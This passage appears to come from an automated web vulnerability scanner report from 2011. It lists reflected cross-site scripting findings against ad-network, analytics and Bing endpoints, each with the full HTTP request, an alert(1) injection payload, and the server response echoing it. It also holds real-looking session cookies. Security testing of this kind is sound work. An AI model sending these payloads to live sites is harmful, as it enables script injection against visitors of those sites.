GET /cmadj/q1.q.bostonccc30'-alert(1)-'57aa03fe9c8/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7277
Date: Tue, 19 Jul 2011 20:44:24 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10104673820_1311108264","http://ad.doubleclick.net/adj/q1.q.bostonccc30'-alert(1)-'57aa03fe9c8/bus;net=q1;u=,q1-10104673820_1311108264,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250",false);</s
...[SNIP]...

4.25. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e984'-alert(1)-'dd44c7ae98c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.boston/bus7e984'-alert(1)-'dd44c7ae98c;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:25 GMT
Content-Length: 7277
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10214352090_1311108265","http://ad.doubleclick.net/adj/q1.q.boston/bus7e984'-alert(1)-'dd44c7ae98c;net=q1;u=,q1-10214352090_1311108265,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250",false);</scr'+
...[SNIP]...

4.26. http://a.collective-media.net/cmadj/q1.q.boston/bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0227'-alert(1)-'538d0f0dee5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.boston/bus;sz=f0227'-alert(1)-'538d0f0dee5 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.27. http://a.netmng.com/hic/ [passback&click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The value of the passback&click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d54"><script>alert(1)</script>747b9ccc342 was submitted in the passback&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=a9d54"><script>alert(1)</script>747b9ccc342 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:21 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:49:21 GMT
Last-Modified: Sun, 17 Jul 2011 20:49:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=AhgqIBD6nIi0D%2BMn34ymEiZLn5OZjtoxsqxCpcC5vQgm7GZTqlc5I2oXIuUgwnU4n2plP0K0puUNNwYhuG8H75jYP1ISWL0c90Oo43tzCoLoVfrrYmwx26HZxEDcjtYQCmlA5hdBUSrdJ9%2FUHM%2B85SzRXd9lorqlEVBuXGeuwdY%3D; expires=Wed, 18-Jan-2012 20:49:21 GMT; path=/
Set-Cookie: evo5_display=6ybBSHUW4qFeA2pi6k6gGjq6S86HctbWeh9cZbJhLk43cYePIOB4VQ2mX5Rf5PzdDBRAx9n6ayvu1Tyzf7hzrQ%3D%3D; expires=Thu, 23-Jun-44591 20:49:21 GMT; path=/; domain=.netmng.com
Content-Length: 1592
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5527925;sz=728x90;click=;ord=1311108561;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=a9d54"><script>alert(1)</script>747b9ccc342;?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.28. http://a.netmng.com/hic/ [passback&click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The value of the passback&click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2db4"><script>alert(1)</script>d8f75878460 was submitted in the passback&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=c2db4"><script>alert(1)</script>d8f75878460 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:48:56 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:48:56 GMT
Last-Modified: Sun, 17 Jul 2011 20:48:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=AhgqIBD6nIi0D%2BMn34ymEiZLn5OZjtoxsqxCpcC5vQgm7GZTqlc5I2oXIuUgwnU4n2plP0K0puUNNwYhuG8H73b%2BWMSS4bgT4NMNPegiWg2gzqKqyo%2BTygjivpTJSduHkiCxwBCHW8sJDNQdsByRkZ%2Bca%2FXNMPxFxzuqfYBik1k%3D; expires=Wed, 18-Jan-2012 20:48:56 GMT; path=/
Set-Cookie: evo5_display=NXTVl5Jg12H73qXg2AB994UKMGdm1eFpHgSl3bE9WM75aU%2Bt%2FiMh%2BJjrcp%2Fxd6sOu8CRr1gQYDywBmKz%2FYbePA%3D%3D; expires=Thu, 23-Jun-44591 20:48:56 GMT; path=/; domain=.netmng.com
Content-Length: 1646
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108536;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=165
...[SNIP]...
36;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=c2db4"><script>alert(1)</script>d8f75878460;?">
...[SNIP]...

4.29. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16176'-alert(1)-'789f99fe84a was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=19316176'-alert(1)-'789f99fe84a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

4.30. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca443'-alert(1)-'8f1f478f920 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchca443'-alert(1)-'8f1f478f920 HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

4.31. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d7d5'%3balert(1)//a883b6014f was submitted in the admeld_adprovider_id parameter. This input was echoed as 4d7d5';alert(1)//a883b6014f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=734d7d5'%3balert(1)//a883b6014f&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:29 GMT
Expires: Tue, 19 Jul 2011 20:44:30 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:30 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:30 GMT; Path=/
Content-Type: text/plain
Content-Length: 191
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=734d7d5';alert(1)//a883b6014f&external_user_id=3449391312096071132"/>');

4.32. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bba35'%3balert(1)//26ade494141 was submitted in the admeld_callback parameter. This input was echoed as bba35';alert(1)//26ade494141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbba35'%3balert(1)//26ade494141 HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:34 GMT
Expires: Tue, 19 Jul 2011 20:44:34 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:34 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:34 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchbba35';alert(1)//26ade494141?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

4.33. http://api.bing.com/qsonhs.aspx [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bing.com
Path:	/qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload f4d2c<img%20src%3da%20onerror%3dalert(1)>ad5e9767223 was submitted in the q parameter. This input was echoed as f4d2c<img src=a onerror=alert(1)>ad5e9767223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIV&q=f4d2c<img%20src%3da%20onerror%3dalert(1)>ad5e9767223 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/search?q='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3ehoyt(0x006623)%3c%2fscript%3e%4E%45%57%53%46%4C%41%53%48%3A%20%4D%53%46%54%20%73%65%6C%6C%73%20%74%6F%20%41%50%50%4C%20%61%6E%64%20%47%4F%4F%47%20%69%6E%20%66%69%72%65%73%61%6C%65%20%6C%69%71%75%69%64%61%74%69%6F%6E%2E&FORM=O1FD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; _HOP=; _SS=SID=7E86734B014B497982A1A3998AE3B12B&CW=1065&CH=723&bIm=510; RMS=F=GgAg&A=AAAAAAAAAAAQAAAk; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2cc751fa2acb014433bae3e06d300eae0d; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: af1b3ddfac804d0092ef7cc9392fca85
Date: Tue, 19 Jul 2011 14:28:18 GMT
Connection: close

{"AS":{"Query":"f4d2c<img src=a onerror=alert(1)>ad5e9767223","FullResults":1}}

4.34. http://api.choicestream.com/instr/api/8e360375d27a5381/a1 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.choicestream.com
Path:	/instr/api/8e360375d27a5381/a1

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2a4f9<script>alert(1)</script>ecd36545afc was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /instr/api/8e360375d27a5381/a1?protocol=ScriptInclude&callback=csAny.Transport.callback2a4f9<script>alert(1)</script>ecd36545afc&request_id=0&json_id=a0b60e38bae29543e86fa96644275bba&json=%7B%22discoveries%22%3A%5B%5D%2C%0A%22activities%22%3A%5B%7B%22type%22%3A%22item_views%22%2C%0A%22attrs%22%3A%7B%22item_id%22%3A%22event_000043582C516D43%22%7D%7D%5D%2C%0A%22get_recos%22%3A%5B%5D%2C%0A%22context%22%3A%7B%22appcontext%22%3A%22tm_event_on_sale%22%2C%0A%22api_key%22%3A%228e360375d27a5381%22%2C%0A%22cookie_id%22%3A%2223fe7a5564101842925261f744f3ff01%22%7D%2C%0A%22transport%22%3A%7B%22endpoint%22%3A%22http%3A%2F%2Fapi.choicestream.com%2Finstr%2Fapi%22%7D%2C%0A%22__cs_rr%22%3A%221%22%7D&_=1311100563081 HTTP/1.1
Host: api.choicestream.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 72db13ee-64b3-4cd9-915b-53b66435f1ec
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:15 GMT
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 122
Cache-Control: private
Content-Length: 122
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 18:36:35 GMT
Connection: close
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:15 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:15 GMT; Path=/

csAny.Transport.callback2a4f9<script>alert(1)</script>ecd36545afc('0',{"status":{"message":"OK","code":0},"reco_sets":[]})

4.35. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3b34b<script>alert(1)</script>bfb92715a68 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83b34b<script>alert(1)</script>bfb92715a68&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:57 GMT
